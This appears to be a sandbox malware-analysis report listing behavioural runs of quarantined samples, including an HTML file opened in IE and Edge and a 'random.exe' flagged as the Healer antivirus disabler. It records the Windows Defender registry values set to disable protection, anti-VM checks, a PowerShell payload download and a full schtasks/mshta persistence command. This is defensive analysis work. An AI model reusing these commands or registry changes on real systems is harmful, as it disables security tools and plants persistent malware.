| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4608EB51-F499-11EF-8504-C668CEC02771} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000abafe974537eba42a70c6cc04c94a12500000000020000000000106600000001000020000000353befe9fe459eb6317b2bc18fad24530b71f8c61b6dfca373a1f275a386f8f9000000000e8000000002000020000000015c01c04859f21174936f41820bdf6a8344a1743f5541c9576b3b8c42f75f722000000080aadfaafa428162cd31eefe0fc6c460f58ac2543bc38f6ff369135df70e7a4f4000000072c8df2cb7070c7b932cdb8b45ed0d43877d393ba67448f17e2430e4b2b15faa049bcdb3207868f1560884cfba81608911a49353c24d70cd8f8f0b4642226bc2 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1388 wrote to memory of 2536 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1388 wrote to memory of 2536 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1388 wrote to memory of 2536 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1388 wrote to memory of 2536 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
128s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4e9546f8,0x7ffe4e954708,0x7ffe4e954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4792 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 93be3a1bf9c257eaf83babf49b0b5e01 |
| SHA1 | d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a |
| SHA256 | 8786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348 |
| SHA512 | 885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52 |
\??\pipe\LOCAL\crashpad_4380_FCFZQUCWKNGHFXBO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6738f4e2490ee5070d850bf03bf3efa5 |
| SHA1 | fbc49d2dd145369e8861532e6ebf0bd56a0fe67c |
| SHA256 | ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab |
| SHA512 | 2939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4e2d71d6ff210326092dc385fb5b747f |
| SHA1 | 68bcca89c257a30cd7096c3be83b9b02fccd82b1 |
| SHA256 | 2b9b0462052913ba0a94fe89845d4d192b815964a9a9e0e048b97e6e90636411 |
| SHA512 | c4c5c35db03890e457159d42e810a55a800d86092fe141e98173301056632079f7f4410557dbde8974279e49ee858bdf2ab583287f938a6d70d89c60f4d9ef6f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9267891b746e1293c1db6d863760ab97 |
| SHA1 | 2a3127e67b9fa12aae0208f9c2a7f2621a703e6c |
| SHA256 | 904af23b3b22aa3ccdb8adcec50275b39a247dcd43392acd28b5f4590259dc39 |
| SHA512 | b962f39f7b86b3d83dbfc9f7c287c746b61a09ac1c9c32a2746d7829cf7687c80ef65111a89762bf961af573dbde16c3b614351d1e3004e6e89c8fc24c0eb92a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0eb92d7fc4cc6e26f79d25b61631feb4 |
| SHA1 | 957dea426f86179728503af52ebb35d82249b4a5 |
| SHA256 | 733e7b9e759012d667a7bde829661c20cf37a73ddaecc404ce910e3eeea45731 |
| SHA512 | 36e9fdbe415afa1ed3af270d007c3a28bfbbc1379a29f50e26339f72e6eafd547a933d209543c32b75fe3d3340452dfafe82ba497c21c818c34b8d4e9ee70bc8 |
Analysis: behavioral25
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn mxT1RmaX9Cr /tr "mshta C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
